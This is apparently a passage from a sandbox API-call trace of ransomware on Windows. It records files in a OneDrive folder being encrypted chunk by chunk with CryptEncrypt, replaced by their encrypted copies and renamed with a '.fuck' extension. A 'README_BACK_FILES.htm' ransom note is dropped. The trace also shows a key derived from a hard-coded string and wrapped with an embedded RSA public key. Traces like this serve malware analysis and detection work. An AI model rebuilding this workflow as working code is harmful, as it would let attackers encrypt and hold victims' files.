(in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.639] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.641] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.642] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.642] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0272.642] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0272.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0272.642] CloseHandle (hObject=0x5d48) returned 1 [0272.642] CloseHandle (hObject=0x5d4c) returned 1 [0272.643] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0272.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0272.676] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0272.678] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0272.680] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0272.680] CryptDestroyKey (hKey=0x2fad48) returned 1 [0272.680] CryptReleaseContext (hProv=0x2f28e48, dwFlags=0x0) returned 1 [0272.681] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0272.681] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0272.681] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\readme_back_files.htm")) returned 0xffffffff [0272.681] AreFileApisANSI () returned 1 [0272.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0272.681] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.682] GetFileType (hFile=0x5d3c) returned 0x1 [0272.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0272.684] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.684] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0272.684] GetLastError () returned 0x0 [0272.684] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif")) returned 0x20 [0272.684] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif", dwFileAttributes=0x80) returned 1 [0272.685] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.686] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.698] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif.gsg", dwFileAttributes=0x2) returned 1 [0272.699] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0272.702] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0272.702] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.702] CryptHashData (hHash=0x2fa748, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.702] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa4c8) returned 1 [0272.702] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.702] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0272.702] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27dd0) returned 1 [0272.703] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27dd0, dwCertEncodingType=0x1, pInfo=0x2f31e80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31eb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31eb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fad88) returned 1 [0272.703] CryptEncrypt (in: hKey=0x2fad88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, 